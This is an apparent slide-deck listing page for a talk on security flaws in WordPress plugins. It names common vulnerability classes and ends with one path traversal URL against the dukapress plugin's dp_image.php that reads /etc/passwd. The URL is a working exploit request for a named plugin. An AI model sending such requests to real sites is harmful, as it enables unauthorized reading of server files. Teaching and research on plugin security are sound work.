Upload
roberto-soares
View
244
Download
0
Embed Size (px)
Citation preview
>> talk(“plugins_the_dark_side”)
Commons Vulnerabilities
Upload Vulnerability Mechanism.
Cross-Site Scripting vulnerability (XSS).
File Download Vulnerability.
Cross-Request-Forgery Vulnerability (CSRF).
SQL Injection Vulnerability (SQL Injection).
>> talk(“http_msf_requests”)
File Read (Traversal)
http://wordpress/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../../../etc/passwd